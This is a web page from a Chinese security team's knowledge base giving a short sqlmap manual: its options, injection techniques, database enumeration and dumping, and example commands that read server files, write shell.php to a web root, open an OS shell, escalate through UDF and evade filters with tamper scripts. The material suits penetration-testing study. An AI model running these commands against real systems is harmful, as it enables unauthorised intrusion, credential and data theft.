<!DOCTYPE html>
<html lang="en-US">
  <head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, user-scalable=no, initial-scale=1.0, maximum-scale=1.0, minimum-scale=1.0">
    <title>sqlmap简要手册 | 狼组安全团队公开知识库</title>
    <meta name="description" content="">
    <meta name="generator" content="VuePress 1.7.1">
    <link rel="icon" href="/assets/logo.svg">
    <script type="text/javascript" src="/assets/js/push.js"></script>
    <meta name="description" content="致力于打造信息安全乌托邦">
    <meta name="referrer" content="never">
    <meta name="keywords" content="知识库,公开知识库,狼组,狼组安全团队知识库,knowledge">
    <link rel="preload" href="/assets/css/0.styles.32ca519c.css" as="style"><link rel="preload" href="/assets/js/app.f7464420.js" as="script"><link rel="preload" href="/assets/js/2.26207483.js" as="script"><link rel="preload" href="/assets/js/70.9fb74c80.js" as="script"><link rel="prefetch" href="/assets/js/10.55514509.js"><link rel="prefetch" href="/assets/js/11.ec576042.js"><link rel="prefetch" href="/assets/js/12.a5584a2f.js"><link rel="prefetch" href="/assets/js/13.c9f84b2e.js"><link rel="prefetch" href="/assets/js/14.d2a5440c.js"><link rel="prefetch" href="/assets/js/15.2f271296.js"><link rel="prefetch" href="/assets/js/16.0895ce42.js"><link rel="prefetch" href="/assets/js/17.627e2976.js"><link rel="prefetch" href="/assets/js/18.73745a4c.js"><link rel="prefetch" href="/assets/js/19.19350186.js"><link rel="prefetch" href="/assets/js/20.e4eac589.js"><link rel="prefetch" href="/assets/js/21.fc0657ba.js"><link rel="prefetch" href="/assets/js/22.f4a1220f.js"><link rel="prefetch" href="/assets/js/23.c8cce92d.js"><link rel="prefetch" href="/assets/js/24.46225ec2.js"><link rel="prefetch" href="/assets/js/25.9b6d75e4.js"><link rel="prefetch" href="/assets/js/26.288f535e.js"><link rel="prefetch" href="/assets/js/27.865bdc75.js"><link rel="prefetch" href="/assets/js/28.f4224fef.js"><link rel="prefetch" href="/assets/js/29.6393a40b.js"><link rel="prefetch" href="/assets/js/3.a509f503.js"><link rel="prefetch" href="/assets/js/30.d5a49f97.js"><link rel="prefetch" href="/assets/js/31.eb3647df.js"><link rel="prefetch" href="/assets/js/32.7f48a571.js"><link rel="prefetch" href="/assets/js/33.1f374ffa.js"><link rel="prefetch" href="/assets/js/34.5a911179.js"><link rel="prefetch" href="/assets/js/35.d2bcc7ef.js"><link rel="prefetch" href="/assets/js/36.42e440bd.js"><link rel="prefetch" href="/assets/js/37.dedbbdea.js"><link rel="prefetch" href="/assets/js/38.d68d1f69.js"><link rel="prefetch" href="/assets/js/39.e278f860.js"><link rel="prefetch" 
href="/assets/js/4.35636da8.js"><link rel="prefetch" href="/assets/js/40.97f4e937.js"><link rel="prefetch" href="/assets/js/41.38630688.js"><link rel="prefetch" href="/assets/js/42.cae56aa5.js"><link rel="prefetch" href="/assets/js/43.61a04b16.js"><link rel="prefetch" href="/assets/js/44.5c6230f2.js"><link rel="prefetch" href="/assets/js/45.0f1355ae.js"><link rel="prefetch" href="/assets/js/46.c1906649.js"><link rel="prefetch" href="/assets/js/47.7ae220ce.js"><link rel="prefetch" href="/assets/js/48.59af224e.js"><link rel="prefetch" href="/assets/js/49.6a33a171.js"><link rel="prefetch" href="/assets/js/5.08ab40ee.js"><link rel="prefetch" href="/assets/js/50.f14601d2.js"><link rel="prefetch" href="/assets/js/51.f20841fd.js"><link rel="prefetch" href="/assets/js/52.fb0a5327.js"><link rel="prefetch" href="/assets/js/53.8013048c.js"><link rel="prefetch" href="/assets/js/54.d132c2f8.js"><link rel="prefetch" href="/assets/js/55.87aa8b5d.js"><link rel="prefetch" href="/assets/js/56.161f38ad.js"><link rel="prefetch" href="/assets/js/57.bd6a2ef2.js"><link rel="prefetch" href="/assets/js/58.8a69f15a.js"><link rel="prefetch" href="/assets/js/59.93c0e2de.js"><link rel="prefetch" href="/assets/js/6.fda5ce3a.js"><link rel="prefetch" href="/assets/js/60.10091d44.js"><link rel="prefetch" href="/assets/js/61.cd1e3b10.js"><link rel="prefetch" href="/assets/js/62.9c0ad8c5.js"><link rel="prefetch" href="/assets/js/63.4a8dd9d2.js"><link rel="prefetch" href="/assets/js/64.6bf3fede.js"><link rel="prefetch" href="/assets/js/65.7a2ccc50.js"><link rel="prefetch" href="/assets/js/66.874d563b.js"><link rel="prefetch" href="/assets/js/67.bb86eab2.js"><link rel="prefetch" href="/assets/js/68.c1db2a2b.js"><link rel="prefetch" href="/assets/js/69.8141480b.js"><link rel="prefetch" href="/assets/js/7.d1fe6bef.js"><link rel="prefetch" href="/assets/js/71.d1e4e9ab.js"><link rel="prefetch" href="/assets/js/72.e6bf83fb.js"><link rel="prefetch" href="/assets/js/73.6dd6c980.js"><link rel="prefetch" 
href="/assets/js/74.3612ba47.js"><link rel="prefetch" href="/assets/js/75.6e1a2434.js"><link rel="prefetch" href="/assets/js/76.5bfa4bcc.js"><link rel="prefetch" href="/assets/js/77.784df031.js"><link rel="prefetch" href="/assets/js/78.aa94a0a0.js"><link rel="prefetch" href="/assets/js/79.c4e9a4f2.js"><link rel="prefetch" href="/assets/js/8.63fd05d7.js"><link rel="prefetch" href="/assets/js/80.8d47d1f7.js"><link rel="prefetch" href="/assets/js/81.1160b022.js"><link rel="prefetch" href="/assets/js/82.7d17e5c8.js"><link rel="prefetch" href="/assets/js/83.a2ff144a.js"><link rel="prefetch" href="/assets/js/84.53d29383.js"><link rel="prefetch" href="/assets/js/9.b49161a4.js">
    <link rel="stylesheet" href="/assets/css/0.styles.32ca519c.css">
  </head>
  <body>
class="sidebar-link">Cobalt Strike</a></li><li><a href="/knowledge/intranet/Aggressor-script.html" title="Aggressor-Script" class="sidebar-link">Aggressor-Script</a></li></ul></section></li><li><section class="sidebar-group collapsable depth-0"><p class="sidebar-heading"><span>Web安全</span> <span class="arrow right"><i aria-label="icon: down" class="anticon anticon-down"><svg viewBox="64 64 896 896" focusable="false" data-icon="down" width="1em" height="1em" fill="currentColor" aria-hidden="true"><path d="M884 256h-75c-5.1 0-9.9 2.5-12.9 6.6L512 654.2 227.9 262.6c-3-4.1-7.8-6.6-12.9-6.6h-75c-6.5 0-10.3 7.4-6.5 12.7l352.6 486.1c12.8 17.6 39 17.6 51.7 0l352.6-486.1c3.9-5.3.1-12.7-6.4-12.7z"></path></svg></i></span></p> <!----></section></li><li><section class="sidebar-group collapsable depth-0"><p class="sidebar-heading"><span>攻防对抗</span> <span class="arrow right"><i aria-label="icon: down" class="anticon anticon-down"><svg viewBox="64 64 896 896" focusable="false" data-icon="down" width="1em" height="1em" fill="currentColor" aria-hidden="true"><path d="M884 256h-75c-5.1 0-9.9 2.5-12.9 6.6L512 654.2 227.9 262.6c-3-4.1-7.8-6.6-12.9-6.6h-75c-6.5 0-10.3 7.4-6.5 12.7l352.6 486.1c12.8 17.6 39 17.6 51.7 0l352.6-486.1c3.9-5.3.1-12.7-6.4-12.7z"></path></svg></i></span></p> <!----></section></li><li><section class="sidebar-group collapsable depth-0"><p class="sidebar-heading"><span>代码审计</span> <span class="arrow right"><i aria-label="icon: down" class="anticon anticon-down"><svg viewBox="64 64 896 896" focusable="false" data-icon="down" width="1em" height="1em" fill="currentColor" aria-hidden="true"><path d="M884 256h-75c-5.1 0-9.9 2.5-12.9 6.6L512 654.2 227.9 262.6c-3-4.1-7.8-6.6-12.9-6.6h-75c-6.5 0-10.3 7.4-6.5 12.7l352.6 486.1c12.8 17.6 39 17.6 51.7 0l352.6-486.1c3.9-5.3.1-12.7-6.4-12.7z"></path></svg></i></span></p> <!----></section></li></ul></aside> <main class="page"> <div class="theme-antdocs-content content__default"><h1 id="sqlmap简介">sqlmap简介 <a href="#sqlmap简介" 
class="header-anchor">#</a></h1> <p><strong>当给sqlmap一个URL，它会干些什么？</strong></p> <blockquote><p>1）判断可注入的参数</p> <p>2）判断可以用哪种SQL注入技术来注入</p> <p>3）识别出哪种数据库</p> <p>4）根据用户选择，读取哪些数据</p></blockquote> <div class="language-bash line-numbers-mode"><pre class="language-bash"><code>--purge		<span class="token comment">#清除历史缓存</span>
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br></div></div><h1 id="选项摘要">选项摘要 <a href="#选项摘要" class="header-anchor">#</a></h1> <h4 id="输出信息的详细程度"><strong>输出信息的详细程度</strong> <a href="#输出信息的详细程度" class="header-anchor">#</a></h4> <div class="language-bash line-numbers-mode"><pre class="language-bash"><code>-v	<span class="token comment">#共7个级别(0~6)，默认为1</span>
<span class="token comment">#可以用 -vv 代替 -v 2，推荐使用这种方法</span>
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br></div></div><ul><li><strong>0</strong>：只输出 Python 出错回溯信息，错误和关键信息</li> <li><strong>1</strong>：增加输出普通信息和警告信息</li> <li><strong>2</strong>：增加输出调试信息</li> <li><strong>3</strong>：增加输出已注入的 payloads</li> <li><strong>4</strong>：增加输出 HTTP 请求</li> <li><strong>5</strong>：增加输出 HTTP 响应头</li> <li><strong>6</strong>：增加输出 HTTP 响应内容</li></ul> <h4 id="目标"><strong>目标</strong> <a href="#目标" class="header-anchor">#</a></h4> <div class="language-bash line-numbers-mode"><pre class="language-bash"><code>-d	<span class="token comment">#直连数据库，&quot;mysql://root:root@192.168.0.8:3306/testdb&quot;</span>
-u URL
-l	<span class="token comment">#从Burp代理日志文件中解析目标地址</span>
-m	<span class="token comment">#从文本文件中批量获取目标</span>
-r	<span class="token comment">#从文件中读取 HTTP 请求</span>

--purge			<span class="token comment">#清除历史缓存</span>
--flush-session	<span class="token comment">#清除上次扫描的缓存</span>
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br><span class="line-number">5</span><br><span class="line-number">6</span><br><span class="line-number">7</span><br><span class="line-number">8</span><br></div></div><h4 id="请求"><strong>请求</strong> <a href="#请求" class="header-anchor">#</a></h4> <p>指定连接目标地址的方式</p> <div class="language-bash line-numbers-mode"><pre class="language-bash"><code>--method<span class="token operator">=</span>METHOD		<span class="token comment">#强制使用提供的 HTTP 方法（例如：PUT）</span>
--data<span class="token operator">=</span>DATA			<span class="token comment">#使用 POST 发送数据串；--data=&quot;id=1&amp;user=admin&quot;</span>
--param-del<span class="token operator">=</span><span class="token string">&quot;;&quot;</span>		<span class="token comment">#指定参数分隔符，例如 --data=&quot;id=1;user=admin&quot;</span>
--cookie<span class="token operator">=</span>COOKIE		<span class="token comment">#指定 HTTP Cookie ，--cookie &quot;id=11&quot; --level 2</span>
--drop-set-cookie	<span class="token comment">#忽略 HTTP 响应中的 Set-Cookie 参数</span>
--user-agent<span class="token operator">=</span>AGENT	<span class="token comment">#指定 HTTP User-Agent</span>
--random-agent		<span class="token comment">#使用随机的 HTTP User-Agent：从 ./txt/user-agents.txt 中随机选取一个并在本次运行中沿用，并非每次请求更换</span>
--referer<span class="token operator">=</span>REFERER	<span class="token comment">#指定 HTTP Referer</span>
-H HEADER			<span class="token comment">#设置额外的 HTTP 头参数（例如：&quot;X-Forwarded-For: 127.0.0.1&quot;）</span>
--headers<span class="token operator">=</span>HEADERS	<span class="token comment">#设置额外的 HTTP 头参数,必须以换行符分隔（例如：&quot;Accept-Language: fr\nETag: 123&quot;）</span>
--delay<span class="token operator">=</span><span class="token number">10</span>			<span class="token comment">#设置每个 HTTP 请求的延迟秒数</span>
--safe-freq<span class="token operator">=</span>SAFE	<span class="token comment">#每访问两次给定的合法 URL 才发送一次测试请求</span>
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br><span class="line-number">5</span><br><span class="line-number">6</span><br><span class="line-number">7</span><br><span class="line-number">8</span><br><span class="line-number">9</span><br><span class="line-number">10</span><br><span class="line-number">11</span><br><span class="line-number">12</span><br></div></div><h4 id="注入"><strong>注入</strong> <a href="#注入" class="header-anchor">#</a></h4> <p>以下选项用于指定要测试的参数</p> <p>提供自定义注入 payloads 和篡改参数的脚本</p> <div class="language-bash line-numbers-mode"><pre class="language-bash"><code>-p TESTPARAMETER	<span class="token comment">#指定需要测试的参数</span>
--skip<span class="token operator">=</span>SKIP			<span class="token comment">#指定要跳过的参数</span>
--dbms<span class="token operator">=</span>DBMS			<span class="token comment">#指定 DBMS 类型（例如：MySQL）</span>
--os<span class="token operator">=</span>OS				<span class="token comment">#指定 DBMS 服务器的操作系统类型</span>
--prefix<span class="token operator">=</span>PREFIX		<span class="token comment">#注入 payload 的前缀字符串</span>
--suffix<span class="token operator">=</span>SUFFIX		<span class="token comment">#注入 payload 的后缀字符串</span>
--tamper<span class="token operator">=</span>TAMPER		<span class="token comment">#用给定脚本修改注入数据</span>
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br><span class="line-number">5</span><br><span class="line-number">6</span><br><span class="line-number">7</span><br></div></div><h4 id="检测"><strong>检测</strong> <a href="#检测" class="header-anchor">#</a></h4> <p>sqlmap 使用的 payloads 直接从文本文件 <code>xml/payloads.xml</code> 中载入。</p> <p>根据该文件顶部的相关指导说明进行设置，如果 sqlmap 漏过了特定的注入，</p> <p>你可以选择自己修改指定的 payload 用于检测。</p> <p><strong>level 共 5 级，级别越高检测越全面，默认为 1</strong></p> <blockquote><p>--level 1	检测 GET 和 POST 参数</p> <p>--level 2	检测 HTTP Cookie</p> <p>--level 3	检测 User-Agent 和 Referer</p> <p>--level 4	检测</p> <p>--level 5	检测 HOST 头</p></blockquote> <p><strong>risk 共 3 级，级别越高风险越大，默认为 1</strong></p> <blockquote><p>--risk 2	 会在默认的检测上添加大量时间型盲注语句测试</p> <p>--risk 3	 会在原基础上添加 <code>OR</code> 类型的布尔型盲注，若注入点位于 UPDATE 语句中可能导致数据库数据被修改</p></blockquote> <h4 id="技术"><strong>技术</strong> <a href="#技术" class="header-anchor">#</a></h4> <p>以下选项用于调整特定 SQL 注入技术的测试方法</p> <div class="language-bash line-numbers-mode"><pre class="language-bash"><code>--technique<span class="token operator">=</span>TECH	<span class="token comment">#使用的 SQL 注入技术（默认为“BEUSTQ”）</span>
B: Boolean-based blind SQL injection（布尔型盲注）
E: Error-based SQL injection（报错型注入）
U: UNION query SQL injection（联合查询注入）
S: Stacked queries SQL injection（堆叠查询注入）
T: Time-based blind SQL injection（时间型盲注）
Q: inline Query injection（内联查询注入）

--time-sec<span class="token operator">=</span>TIMESEC  <span class="token comment">#设置时间型盲注的延时秒数（默认为 5）</span>
--second-order<span class="token operator">=</span>S<span class="token punctuation">..</span>  <span class="token comment">#设置二阶响应的结果显示页面的 URL（该选项用于二阶 SQL 注入）</span>
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br><span class="line-number">5</span><br><span class="line-number">6</span><br><span class="line-number">7</span><br><span class="line-number">8</span><br><span class="line-number">9</span><br><span class="line-number">10</span><br></div></div><h4 id="枚举"><strong>枚举</strong> <a href="#枚举" class="header-anchor">#</a></h4> <p>以下选项用于获取数据库的信息，结构和数据表中的数据。</p> <div class="language-bash line-numbers-mode"><pre class="language-bash"><code>-a, --all          <span class="token comment">#获取所有信息、数据</span>
-b, --banner        <span class="token comment">#获取 DBMS banner,返回数据库的版本号</span>
--current-user			<span class="token comment">#获取 DBMS 当前用户</span>
--current-db			<span class="token comment">#获取 DBMS 当前数据库</span>
--hostname				<span class="token comment">#获取 DBMS 服务器的主机名</span>
--is-dba				<span class="token comment">#探测 DBMS 当前用户是否为 DBA（数据库管理员）</span>
--users					<span class="token comment">#枚举出 DBMS 所有用户</span>
--passwords				<span class="token comment">#枚举出 DBMS 所有用户的密码哈希</span>
--privileges			<span class="token comment">#枚举出 DBMS 所有用户的权限</span>
--roles					<span class="token comment">#枚举出 DBMS 所有用户角色</span>

--dbs					<span class="token comment">#枚举出 DBMS 所有数据库</span>
--tables				<span class="token comment">#枚举出 DBMS 数据库中的所有表</span>
--columns				<span class="token comment">#枚举出 DBMS 表中的所有列</span>
--schema				<span class="token comment">#枚举出 DBMS 所有模式</span>
--count					<span class="token comment">#获取数据表数目</span>
--dump					<span class="token comment">#导出 DBMS 数据库表项</span>
--stop <span class="token number">10</span>				<span class="token comment">#只取前10行数据</span>
    
-D DB					<span class="token comment">#指定要枚举的 DBMS 数据库</span>
-T TBL					<span class="token comment">#指定要枚举的 DBMS 数据表</span>
-C COL					<span class="token comment">#指定要枚举的 DBMS 数据列</span>
    
--sql-query<span class="token operator">=</span>QUERY		<span class="token comment">#指定要执行的 SQL 语句</span>
--sql-shell				<span class="token comment">#调出交互式 SQL shell</span>
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br><span class="line-number">5</span><br><span class="line-number">6</span><br><span class="line-number">7</span><br><span class="line-number">8</span><br><span class="line-number">9</span><br><span class="line-number">10</span><br><span class="line-number">11</span><br><span class="line-number">12</span><br><span class="line-number">13</span><br><span class="line-number">14</span><br><span class="line-number">15</span><br><span class="line-number">16</span><br><span class="line-number">17</span><br><span class="line-number">18</span><br><span class="line-number">19</span><br><span class="line-number">20</span><br><span class="line-number">21</span><br><span class="line-number">22</span><br><span class="line-number">23</span><br><span class="line-number">24</span><br><span class="line-number">25</span><br></div></div><h1 id="用例">用例 <a href="#用例" class="header-anchor">#</a></h1> <p><strong>从文件读取HTTP请求，GET和POST都可以</strong></p> <div class="language-bash line-numbers-mode"><pre class="language-bash"><code>sqlmap -r <span class="token string">&quot;burp.txt&quot;</span> -p <span class="token string">&quot;username&quot;</span>	<span class="token comment">#-p 指定存在注入的参数</span>
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br></div></div><p><strong>Cookie注入</strong></p> <div class="language-bash line-numbers-mode"><pre class="language-bash"><code>sqlmap -u <span class="token string">&quot;http://www.vuln.com&quot;</span> --cookie <span class="token string">&quot;id=11&quot;</span> --level <span class="token number">2</span>
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br></div></div><p><strong>当防火墙，对请求速度做了限制</strong></p> <div class="language-bash line-numbers-mode"><pre class="language-bash"><code>sqlmap -u <span class="token string">&quot;http://www.vuln.com/post.php?id=1&quot;</span> --delay<span class="token operator">=</span><span class="token number">10</span>
<span class="token comment">#每个 HTTP 请求之间延迟 10 秒</span>
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br></div></div><h2 id="伪静态注入">伪静态注入 <a href="#伪静态注入" class="header-anchor">#</a></h2> <div class="language-bash line-numbers-mode"><pre class="language-bash"><code>sqlmap  -u http://victim.com/id/666*.html --dbs  <span class="token comment">#用 '*' 标记注入位置（此处在 html 扩展名前）</span>
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br></div></div><h2 id="访问文件系统">访问文件系统 <a href="#访问文件系统" class="header-anchor">#</a></h2> <p>仅对 MySQL、MSSQL、PostgreSQL 有效</p> <p>前提：数据库用户具有文件读写权限，且目标目录可读写</p> <div class="language-bash line-numbers-mode"><pre class="language-bash"><code>sqlmap -u url --is-dba
<span class="token comment">#检查当前数据库用户是否为 DBA，后续文件操作需要 root/DBA 级权限</span>

sqlmap -u url --file-read <span class="token string">&quot;C:/Windows/win.ini&quot;</span>		
<span class="token comment">#读取目标服务器上的文件</span>

sqlmap -u url --file-write<span class="token operator">=</span>D:/shell.php --file-dest<span class="token operator">=</span>C:/www/shell.php
<span class="token comment">#写入文件（--file-write 为本地文件路径，--file-dest 为目标服务器上的写入路径）</span>
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br><span class="line-number">5</span><br><span class="line-number">6</span><br><span class="line-number">7</span><br><span class="line-number">8</span><br></div></div><h2 id="接管操作系统">接管操作系统 <a href="#接管操作系统" class="header-anchor">#</a></h2> <p>仅对 MySQL、MSSQL、PostgreSQL 有效</p> <p>前提：数据库用户具有文件读写权限，且目标目录可读写</p> <p>sqlmap 能够在<strong>数据库所在服务器的操作系统上运行任意的命令</strong></p> <div class="language-bash line-numbers-mode"><pre class="language-bash"><code>sqlmap -u <span class="token string">&quot;URL&quot;</span> --os-shell	<span class="token comment">#获取交互式系统 shell；或用 --os-cmd=id 执行单条系统命令</span>
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br></div></div><p><a href="https://blog.sari3l.com/posts/8dea0d95/" target="_blank" rel="noopener noreferrer">原理<span><svg xmlns="http://www.w3.org/2000/svg" aria-hidden="true" focusable="false" x="0px" y="0px" viewBox="0 0 100 100" width="15" height="15" class="icon outbound"><path fill="currentColor" d="M18.8,85.1h56l0,0c2.2,0,4-1.8,4-4v-32h-8v28h-48v-48h28v-8h-32l0,0c-2.2,0-4,1.8-4,4v56C14.8,83.3,16.6,85.1,18.8,85.1z"></path> <polygon fill="currentColor" points="45.7,48.7 51.3,54.3 77.2,28.5 77.2,37.2 85.2,37.2 85.2,14.9 62.8,14.9 62.8,22.9 71.5,22.9"></polygon></svg> <span class="sr-only">(opens new window)</span></span></a>就是上传一个upload木马后，再上传一个cmd shell；</p> <p>当 --os-shell 退出后， 会调用后门脚本删除上传文件后，进行自删除。</p> <blockquote><p>在 MySQL 和 PostgreSQL 中，sqlmap 可以上传一个包含两个用户自定义函数</p> <p>分别为 <code>sys_exec()</code> 和 <code>sys_eval()</code> 的共享库（二进制文件）</p> <p>然后在数据库中创建出两个对应函数，并调用对应函数执行特定的命令，并允许用户选择是否打印出相关命令执行的结果。</p> <p>在 Microsoft SQL Server 中，sqlmap 会利用 <code>xp_cmdshell</code> 存储过程：</p> <p>如果该存储过程被关闭了（Microsoft SQL Server 的 2005 及以上版本默认关闭），sqlmap 则会将其重新打开；</p> <p>如果该存储过程不存在，sqlmap 则会重新创建它。</p> <p>当用户请求标准输出，sqlmap 将使用任何可用的 SQL 注入技术（盲注、带内注入、报错型注入）去获取对应结果。</p> <p>相反，如果无需标准输出对应结果，sqlmap 则会使用堆叠查询注入（Stacked queries）技术执行相关的命令。</p> <p>如果堆叠查询没有被 Web 应用识别出来，并且 DBMS 为 MySQL，</p> <p>假如后端 DBMS 和 Web 服务器在同一台服务器上，</p> <p>则仍可以通过利用 <code>SELECT</code> 语句中的 <code>INTO OUTFILE</code>，在 根目录可写目录中写shell</p></blockquote> <h2 id="udf提权">UDF提权 <a href="#udf提权" class="header-anchor">#</a></h2> <p>使用选项 <code>--udf-inject</code> 并按照说明进行操作即可；</p> <p>如果需要，也可以使用 <code>--shared-lib</code> 选项通过命令行指定共享库的本地文件系统路径。</p> <p>否则 sqlmap 会在运行时向你询问路径。</p> <p>此功能仅对 MySQL 或 PostgreSQL 有用。</p> <h1 id="tamper脚本">tamper脚本 <a href="#tamper脚本" class="header-anchor">#</a></h1> <div class="language-bash line-numbers-mode"><pre class="language-bash"><code>use age：sqlmap.py --tamper<span class="token operator">=</span><span class="token 
string">&quot;模块名.py&quot;</span>
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br></div></div><div class="language-bash line-numbers-mode"><pre class="language-bash"><code>apostrophemask			<span class="token comment">#将单引号 url 编码</span>
apostrophenullencode	<span class="token comment">#将单引号替换为宽字节 unicode 字符</span>
base64encode			<span class="token comment">#base64 编码</span>
between			<span class="token comment">#将大于符号和等号用 between 语句替换，用于过滤了大于符号和等号的情况</span>
bluecoat		<span class="token comment">#用随机的空白字符代替空格，并且将等号替换为 like ，用于过滤了空格和等号的情况</span>
charencode				<span class="token comment">#用 url 编码一次你的 payload</span>
charunicodeencode		<span class="token comment">#用 unicode 编码 payload，仅编码尚未编码的字符</span>
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br><span class="line-number">5</span><br><span class="line-number">6</span><br><span class="line-number">7</span><br></div></div><p><a href="https://wooyun.js.org/drops/SQLMAP%E8%BF%9B%E9%98%B6%E4%BD%BF%E7%94%A8.html" target="_blank" rel="noopener noreferrer">自定义tamper<span><svg xmlns="http://www.w3.org/2000/svg" aria-hidden="true" focusable="false" x="0px" y="0px" viewBox="0 0 100 100" width="15" height="15" class="icon outbound"><path fill="currentColor" d="M18.8,85.1h56l0,0c2.2,0,4-1.8,4-4v-32h-8v28h-48v-48h28v-8h-32l0,0c-2.2,0-4,1.8-4,4v56C14.8,83.3,16.6,85.1,18.8,85.1z"></path> <polygon fill="currentColor" points="45.7,48.7 51.3,54.3 77.2,28.5 77.2,37.2 85.2,37.2 85.2,14.9 62.8,14.9 62.8,22.9 71.5,22.9"></polygon></svg> <span class="sr-only">(opens new window)</span></span></a></p></div> <footer class="page-edit"><!----> <div class="last-updated"><span class="prefix">上次更新:</span> <span class="time">12/18/2021, 12:46:42 PM</span></div></footer> <div class="page-nav"><p class="inner"><span class="prev"><a href="/knowledge/tools/nmap.html" class="prev"><i aria-label="icon: left" class="anticon anticon-left"><svg viewBox="64 64 896 896" focusable="false" data-icon="left" width="1em" height="1em" fill="currentColor" aria-hidden="true"><path d="M724 218.3V141c0-6.7-7.7-10.4-12.9-6.3L260.3 486.8a31.86 31.86 0 0 0 0 50.3l450.8 352.1c5.3 4.1 12.9.4 12.9-6.3v-77.3c0-4.9-2.3-9.6-6.1-12.6l-360-281 360-281.1c3.8-3 6.1-7.7 6.1-12.6z"></path></svg></i>
        <i aria-label="icon: right" class="anticon anticon-right"><svg viewBox="64 64 896 896" focusable="false" data-icon="right" width="1em" height="1em" fill="currentColor" aria-hidden="true"><path d="M765.7 486.8L314.9 134.7A7.97 7.97 0 0 0 302 141v77.3c0 4.9 2.3 9.6 6.1 12.6l360 281.1-360 281.1c-3.9 3-6.1 7.7-6.1 12.6V883c0 6.7 7.7 10.4 12.9 6.3l450.8-352.1a31.96 31.96 0 0 0 0-50.4z"></path></svg></i></a></span></p></div> </main> <!----></div><div class="global-ui"></div></div>
    <script src="/assets/js/app.f7464420.js" defer></script><script src="/assets/js/2.26207483.js" defer></script><script src="/assets/js/70.9fb74c80.js" defer></script>
  </body>
</html>